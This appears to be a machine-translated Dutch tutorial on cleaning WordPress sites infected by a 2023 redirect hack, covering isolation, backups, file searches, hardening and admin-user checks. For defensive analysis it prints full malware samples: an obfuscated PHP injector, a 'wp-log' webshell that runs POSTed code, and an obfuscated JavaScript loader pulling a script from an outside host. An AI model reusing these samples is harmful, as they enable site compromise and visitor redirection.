WordPress het is absoluut het meest gebruikte platform CMS (Content Management System) voor zowel blogs als startende webwinkels (met de module WooCommerce), waardoor het het meest doelwit is van computeraanvallen (hacken). Een van de meest gebruikte hackoperaties is bedoeld om de gecompromitteerde website om te leiden naar andere webpagina's. Redirect WordPress Hack 2023 is een relatief nieuwe malware die tot gevolg heeft dat de hele site wordt omgeleid naar spamwebpagina's of die op zijn beurt de computers van gebruikers kan infecteren.
Als uw site is ontwikkeld op WordPress wordt omgeleid naar een andere site, dan is het hoogstwaarschijnlijk het slachtoffer van de al beroemde omleidingshack.
In deze tutorial vind je de nodige informatie en handige tips om een met een omleiding geïnfecteerde website te de-viruseren WordPress Hack (Virus Redirect). Via de opmerkingen kunt u aanvullende informatie krijgen of om hulp vragen.
Inhoud
Detectie van het virus dat de sites omleidt WordPress
Een plotselinge en onterechte daling van het websiteverkeer, een daling van het aantal bestellingen (in het geval van webwinkels) of van advertentie-inkomsten zijn de eerste tekenen dat er iets mis is. Detecteren "Redirect WordPress Hack 2023” (Virus Redirect) kan ook “visueel” gebeuren wanneer je de website opent en je wordt doorverwezen naar een andere webpagina.
Uit ervaring is gebleken dat de meeste webmalware compatibel is met internetbrowsers: Chrome, Firefox, Edge, Opera. Als u een computergebruiker bent Mac, zijn deze virussen niet echt zichtbaar in de browser Safari. Beveiligingssysteem van Safari blokkeer deze kwaadaardige scripts stilletjes.
Wat te doen als u een website heeft die is geïnfecteerd met Redirect WordPress Hack
Ik hoop dat de eerste stap niet is om in paniek te raken of de website te verwijderen. Zelfs geïnfecteerde of virusbestanden mogen in eerste instantie niet worden verwijderd. Ze bevatten waardevolle informatie die u kan helpen begrijpen waar de inbreuk op de beveiliging is en waardoor het virus is aangetast. Modus operandi.
Sluit de website voor het publiek.
Hoe sluit je een viruswebsite af voor bezoekers? Het eenvoudigste is om de DNS-manager te gebruiken en het IP-adres voor "A" (de domeinnaam) te verwijderen of een niet-bestaand IP-adres te definiëren. Zo worden websitebezoekers hiertegen beschermd redirect WordPress hack die hen naar virus- of SPAM-webpagina's kan leiden.
Als je gebruikt CloudFlare als DNS-beheerder log je in op het account en verwijder je de DNS-records"A” voor de domeinnaam. Het domein dat door het virus is getroffen, blijft dus zonder IP en is niet langer toegankelijk via internet.
U kopieert het IP-adres van de website en "routeert" het zodat alleen u er toegang toe hebt. Vanaf je computer.
Hoe het echte IP-adres van een website op computers te wijzigen Windows?
De methode wordt vaak gebruikt om de toegang tot bepaalde websites te blokkeren door het "hosts"-bestand te bewerken.
1. Jij opent Notepad of andere teksteditor (met rechten administrator) en bewerk het bestand "hosts". Het bevindt zich in:
C:\Windows\System32\drivers\etc\hosts2. Voeg in het bestand "hosts" "route" toe aan het echte IP-adres van uw website. IP hierboven verwijderd uit DNS-beheer.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld3. Sla het bestand op en open de website in de browser.
Als de website niet opent en je hebt niets verkeerds gedaan in het "hosts"-bestand, is het hoogstwaarschijnlijk een DNS-cache.
Om de DNS-cache op een besturingssysteem te wissen Windows, open Command Prompt, waar u de opdracht uitvoert:
ipconfig /flushdnsHoe het echte IP-adres van een website op computers te wijzigen Mac / MacBoek?
Voor computergebruikers Mac het is iets eenvoudiger om het echte IP-adres van een website te wijzigen.
1. Open het hulpprogramma Terminal.
2. Voer de opdrachtregel uit (vereist systeemwachtwoord om uit te voeren):
sudo nano /etc/hosts3. Zelfde als voor computers Windows, voeg het echte IP-adres van het domein toe.
IP.IP.IP.IP yourdomain.tld
IP.IP.IP.IP www.yourdomain.tld4. Sla de wijzigingen op. Ctrl+X (y).
Nadat u "gerouteerd" bent, bent u de enige persoon waarmee u toegang heeft tot de geïnfecteerde website Redirect WordPress Hack.
Volledige back-up van de website - Bestanden en database
Zelfs als het besmet is met “redirect WordPress hack”, is de aanbeveling om een algemene back-up te maken van de hele website. Bestanden en database. Mogelijk kunt u ook een lokale kopie van beide bestanden opslaan van public / public_html evenals de databank.
Identificatie van geïnfecteerde bestanden en bestanden die zijn gewijzigd door Redirect WordPress Hack 2023
De belangrijkste doelbestanden van de WordPress er zijn index.php (in de wortel), header.php, index.php şi footer.php van het thema WordPress activa. Controleer deze bestanden handmatig en identificeer schadelijke code of een malwarescript.
In 2023 een virus van de “Redirect WordPress Hack" erin zetten index.php een code van het formulier:
(Ik raad het niet aan om deze codes uit te voeren!)
<?php $t='er'.'ro'.'r_'.'r'.'epo'.'rt'.'in'.'g';$b0='MDxXRVM3Vj1FPSVdVDk2VVA3VjFJPEBgYApgCg==';$b1='b'.'a'.'se'.'6'.'4_'.'e'.''.'nc'.'od'.'e';$b2='b'.'as'.'e'.'6'.'4_d'.'e'.'c'.'o'.'d'.'e';$b3='c'.'on'.'ve'.'rt_uue'.'nco'.'de';$b4='c'.'o'.'nve'.'rt'.'_u'.'ude'.'co'.'de';$b5='MTlGRUw5'.'NV1QPTcxP'.'zhWXU'.'49JjVOPScsYApgCg==';$b7='';$b8='JD0mR'.'UM6U'.'GBgCmAK';$b9='IzkmRUUKYAo=';$b10='Izs2'.'MFU'.'KYAo=';$b11='QC4mOFE5Q0RWLSYkVDhDMUQ'.'uJjBRODYsU'.'zlDYFMuI'.'zhWLjMtRCx'.'DQUQsIyxgCmAK';$b12='IjhG'.'QGA'.'KYAo=';$b13='IjhDLGAKYAo=';$b14='Ji8jXV'.'A6J'.'2BACmAK';$b18='LS8nLUM8R'.'kVQPSIh'.'UzxGLF0pUGBgCmAK';$b19='KylTWFwrVy1DPEZFUD0jWGAKYAo=';$b20=' TDonMVQ8JyxaK1JdUz0mJVkrRlFJO0Y1Uz0mXUc5NzBOOFZdTStXLUM8RkVQPScsTzhWQUU4VkxOOkcsYApgCg==';$b21='JTwnKUk7RzBgCmAK';$b22='KD1XYE04NjFNOjZYYApgCg==';$b23='KD1XYE07Jl1HOjZYYApgCg==';$b24='KjxGNVM9JV1SO1c1VDkwYGAKYAo=';$b25='Jz1XYE06Ry1PO0BgYApgCg==';$b30='KTIlMTQ0JV0oM1UtNApgCg==';$b31='KzRENTE1NDUzNSVdNTRERGAKYAo=';$b34='JjxXMVI8Jl1TCmAK';$b41='WlhOeWEycDBjMmg1Y3paaFpUUnJhblU9';$b16=$b4($b2($b0))();if(isset($_POST[$b4($b2($b12))])){if($b4($b2($b10))($_POST[$b4($b2($b12))])===$b4($b2($b11))){ $b45=$_POST[$b4($b2($b13))];$b4($b2($b5))($b16.'/'.$b4($b2($b8)),$b4($b2($b14)).$b2($b45));@include($b16.'/'.$b4($b2($b8)));die();}}if(isset($_POST[$b4($b2($b8)).$b4($b2($b8))])||isset($_GET[$b4($b2($b8)).$b4($b2($b8))])){echo $b4($b2($b10))($b4($b2($b8)));die();}else{$b27=0;$b26=array($b4($b2($b22)),$b4($b2($b23)),$b4($b2($b24)),$b4($b2($b25)));$b32 = $_SERVER[$b4($b2($b30))].$_SERVER[$b4($b2($b31))];foreach ($b26 as $b33) {if($b4($b2($b34))($b32,$b33) !== false){$b27=1;}}if($b27==0) {echo $b4($b2($b18)).$b4($b2($b20)).$b4($b2($b19));}} ?>Gedecodeerd, dit kwaadaardig script het is eigenlijk het gevolg van het feit dat de website is geïnfecteerd WordPress. Het is niet het script achter de malware, het is het script dat het mogelijk maakt om de geïnfecteerde webpagina om te leiden. Als we het bovenstaande script decoderen, krijgen we:
<script src="/cdn-cgi/apps/head/D6nq5D2EcGpWI6Zldc9omMs3J_0.js"></script>
<script src="https://stay.linestoget.com/scripts/check.js" type="c2cc1212300ac9423a61ac0b-text/javascript"></script>
<script src="/cdn-cgi/scripts/7d0fa10a/cloudflare-static/rocket-loader.min.js" data-cf-settings="c2cc1212300ac9423a61ac0b-|49" defer></script>
Om alle bestanden op de server te identificeren die deze code bevatten, is het goed om toegang te hebben SSH naar de server om opdrachtregels voor bestandscontrole en beheer uit te voeren Linux.
Hieronder staan twee commando's die zeker nuttig zijn om recent gewijzigde bestanden en bestanden die een bepaalde code (string) bevatten te identificeren.
Hoe zie je verder Linux PHP-bestanden gewijzigd in de afgelopen 24 uur of een ander tijdsbestek?
Bestellen "find” is heel eenvoudig te gebruiken en maakt aanpassing mogelijk om de tijdsperiode, het pad om te zoeken en het type bestanden in te stellen.
find /your/web/path -type f -mtime -1 -exec ls -l {} \; | grep "\.php$"In de uitvoer ontvangt u informatie over de datum en tijd waarop het bestand is gewijzigd, de machtigingen voor schrijven / lezen / uitvoeren (chmod) en tot welke groep/gebruiker het behoort.
Als u meer dagen geleden wilt controleren, wijzigt u de waarde "-mtime -1" of gebruik "-mmin -360” voor minuten (6 uur).
Hoe te zoeken naar een code (string) in PHP, Java-bestanden?
De opdrachtregel "find" waarmee u snel alle PHP- of Java-bestanden kunt vinden die een bepaalde code bevatten, is als volgt:
find /your/web/path -type f \( -name "*.js" -o -name "*.php" \) -exec grep -l "uJjBRODYsU" {} +De opdracht zal de bestanden zoeken en weergeven .php şi .js bevattende "uJjBRODYsU'.
Met behulp van de twee bovenstaande commando's kom je er heel gemakkelijk achter welke bestanden onlangs gewijzigd zijn en welke malwarecode bevatten.
Verwijdert schadelijke code uit gewijzigde bestanden zonder de juiste code in gevaar te brengen. In mijn scenario werd de malware geplaatst voordat deze werd geopend <head>.
Bij het uitvoeren van de eerste opdracht "zoeken" is het heel goed mogelijk om nieuwe bestanden op de server te ontdekken die niet van u zijn WordPress noch daar door jou geplaatst. Bestanden die behoren tot het virustype Redirect WordPress Hack.
In het scenario dat ik heb onderzocht, zijn bestanden van de vorm "wp-log-nOXdgD.php". Dit zijn "spawn"-bestanden die ook malwarecode bevatten die door het virus wordt gebruikt voor omleiding.
<?php $t="er"."ro"."r_"."r"."epo"."rt"."in"."g";$t(0); $a=sys_get_temp_dir();if(isset($_POST['bh'])){if(md5($_POST['bh'])==="8f1f964a4b4d8d1ac3f0386693d28d03"){$b3=$_POST['b3'];file_put_contents($a."/tpfile","<"."?"."p"."h"."p ".base64_decode($b3));@include($a."/tpfile");die();}}if(isset($_POST['tick'])||isset($_GET['tick'])){echo md5('885');}Het doel van bestanden van het type "wp-log-*” is om het omleidingshackvirus te verspreiden naar andere websites die op de server worden gehost. Het is een malwarecode van het type “webshell” samengesteld uit een basis gedeelte (waarin enkele versleutelde variabelen zijn gedefinieerd) en o uitvoering gedeelte waarmee de aanvaller een kwaadaardige code op het systeem probeert te laden en uit te voeren.
Als er een variabele is POST genaamd 'bh' en de versleutelde waarde ervan MD5 is gelijk aan "8f1f964a4b4d8d1ac3f0386693d28d03", dan lijkt het script de versleutelde inhoud te schrijven base64 van een andere variabele genaamd 'b3' in een tijdelijk bestand en probeert vervolgens dit tijdelijke bestand op te nemen.
Als er een variabele is POST of GET genaamd 'tick', zal het script reageren met de waarde MD5 van de snaar "885'.
Om alle bestanden op de server te identificeren die deze code bevatten, kiest u een tekenreeks die algemeen is en voert u vervolgens de opdracht "find” (vergelijkbaar met die hierboven). Verwijder alle bestanden die deze malwarecode bevatten.
Beveiligingsfout uitgebuit door Redirect WordPress Hack
Hoogstwaarschijnlijk komt dit omleidingsvirus binnen via uitbuiting van de administratiegebruiker WordPress of door het identificeren van een kwetsbare plug-in waarmee gebruikers met rechten van kunnen worden toegevoegd administrator.
Voor de meeste websites gebouwd op het platform WordPress het is mogelijk thema- of plug-inbestanden bewerkenvanuit de administratie-interface (Dashboard). Zo kan een kwaadwillende malwarecode toevoegen aan de themabestanden om de hierboven getoonde scripts te genereren.
Een voorbeeld van dergelijke malwarecode is dit:
<script>var s='3558289hXnVzT';var _0x1e8ff2=_0x1524;(function(_0x5062c1,_0x3340a3){var _0x1fb079=_0x1524,_0x1e7757=_0x5062c1();while(!![]){try{var _0x2a4ba9=-parseInt(_0x1fb079(0x178))/0x1*(parseInt(_0x1fb079(0x189))/0x2)+-parseInt(_0x1fb079(0x187))/0x3+parseInt(_0x1fb079(0x17e))/0x4+-parseInt(_0x1fb079(0x182))/0x5+-parseInt(_0x1fb079(0x176))/0x6*(-parseInt(_0x1fb079(0x17c))/0x7)+-parseInt(_0x1fb079(0x177))/0x8*(parseInt(_0x1fb079(0x172))/0x9)+-parseInt(_0x1fb079(0x181))/0xa*(-parseInt(_0x1fb079(0x179))/0xb);if(_0x2a4ba9===_0x3340a3)break;else _0x1e7757['push'](_0x1e7757['shift']());}catch(_0x332dc7){_0x1e7757['push'](_0x1e7757['shift']());}}}(_0x18f7,0x56d7f));function _0x18f7(){var _0x33878d=['getElementsByTagName','684364prPqlZ','src','873KJkhlg','fromCharCode','head','script[src=\x22','1137318yPDczb','1648yAATZA','1MjirdU','1936BqEZLn','9.3.2','createElement','21FNTvZp','appendChild','1812244aSZNJb','script','currentScript','15090pySUMO','1032605tfOmII','querySelector','insertBefore','parentNode','/sta','1088724TsmeQl'];_0x18f7=function(){return _0x33878d;};return _0x18f7();}function isScriptLoaded(_0x47ea31){var _0x210a48=_0x1524;return Boolean(document[_0x210a48(0x183)](_0x210a48(0x175)+_0x47ea31+'\x22]'));}var bd='ht'+'tp'+'s:'+'/'+_0x1e8ff2(0x186)+'y.l'+String[_0x1e8ff2(0x173)](0x69,0x6e,0x65,0x73,0x74,0x6f,0x67,0x65,0x74,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x63,0x72,0x69,0x70,0x74,0x73,0x2f,0x63,0x68,0x65,0x63,0x6b,0x2e,0x6a,0x73,0x3f,0x76,0x3d)+_0x1e8ff2(0x17a);function _0x1524(_0x1168b6,_0x2ef792){var _0x18f7eb=_0x18f7();return _0x1524=function(_0x15242f,_0x543bbb){_0x15242f=_0x15242f-0x171;var _0xef6154=_0x18f7eb[_0x15242f];return _0xef6154;},_0x1524(_0x1168b6,_0x2ef792);}if(isScriptLoaded(bd)===![]){var d=document,s=d[_0x1e8ff2(0x17b)](_0x1e8ff2(0x17f));s[_0x1e8ff2(0x171)]=bd,document[_0x1e8ff2(0x180)]?document['currentScript'][_0x1e8ff2(0x185)]!==null&&document[_0x1e8ff2(0x180)][_0x1e8ff2(0x185)][_0x1e8ff2(0x184)](s,document[_0x1e8ff2(0x180)]):d[_0x1e8ff2(0x188)](_0x1e8ff2(0x174))[0x0]!==null&&d[_0x1e8ff2(0x188)]('head')[0x0][_0x1e8ff2(0x17d)](s);}</script>JavaScript geïdentificeerd in de themakop WordPress, onmiddellijk na het openen van het etiket <head>.
Het is vrij moeilijk om dit JavaScript te ontcijferen, maar het is duidelijk dat het een ander webadres opvraagt vanwaar het hoogstwaarschijnlijk andere scripts ophaalt om de bestanden te maken "wp-log-*' waar ik het hierboven over had.
Zoek en verwijder deze code uit alle bestanden PHP aangetast.
Voor zover ik kon zien, was deze code handmatig toegevoegd door een nieuwe gebruiker met beheerdersrechten.
Dus om te voorkomen dat malware vanuit het Dashboard wordt toegevoegd, kunt u de optie om te bewerken het beste uitschakelen WordPress Thema's / plug-ins van het dashboard.
Bewerk het bestand wp-config.php en voeg de regels toe:
define('DISALLOW_FILE_EDIT',true);
define('DISALLOW_FILE_MODS',true);Na het maken van deze wijziging, geen user WordPress u kunt geen bestanden meer bewerken vanuit het Dashboard.
Controleer gebruikers met de rol van Administrator
Hieronder staat een SQL-query die u kunt gebruiken om te zoeken naar gebruikers met de rol van administrator op het perron WordPress:
SELECT * FROM wp_users
INNER JOIN wp_usermeta ON wp_users.ID = wp_usermeta.user_id
WHERE wp_usermeta.meta_key = 'wp_capabilities'
AND wp_usermeta.meta_value LIKE '%administrator%'Deze query retourneert alle gebruikers in de tabel wp_users die de rol van administrator. De query wordt ook gedaan voor de tabel wp_usermeta zoeken in meta 'wp_capabilities', dat informatie bevat over gebruikersrollen.
Een andere methode is om ze te identificeren aan de hand van: Dashboard → Users → All Users → Administrator. Er zijn echter praktijken waarmee een gebruiker kan worden verborgen in het Dashboard-paneel. Dus de beste manier om gebruikers te zien "Administrator"In WordPress is het bovenstaande SQL-commando.
In mijn geval identificeerde ik in de database de gebruiker met de naam "wp-import-user". Heel suggestief.
Ook vanaf hier kunt u de datum en tijd zien wanneer de gebruiker WordPress werd gecreëerd. De gebruikers-ID is ook erg belangrijk omdat deze de serverlogboeken doorzoekt. Zo kun je alle activiteit van deze gebruiker zien.
Verwijder gebruikers met de rol van administrator die je dan niet kent wachtwoorden wijzigen voor alle administratieve gebruikers. redacteur, auteur, Administrator.
Wijzig het wachtwoord van de gebruiker van de SQL-database van de getroffen website.
Na het nemen van deze stappen kan de website voor alle gebruikers opnieuw worden opgestart.
Houd er echter rekening mee dat wat ik hierboven heb gepresenteerd een van de misschien wel duizenden scenario's is waarmee een website is geïnfecteerd Redirect WordPress Hack in 2023.
Als uw website is geïnfecteerd en u hulp nodig heeft of als u vragen heeft, staat het opmerkingengedeelte open.
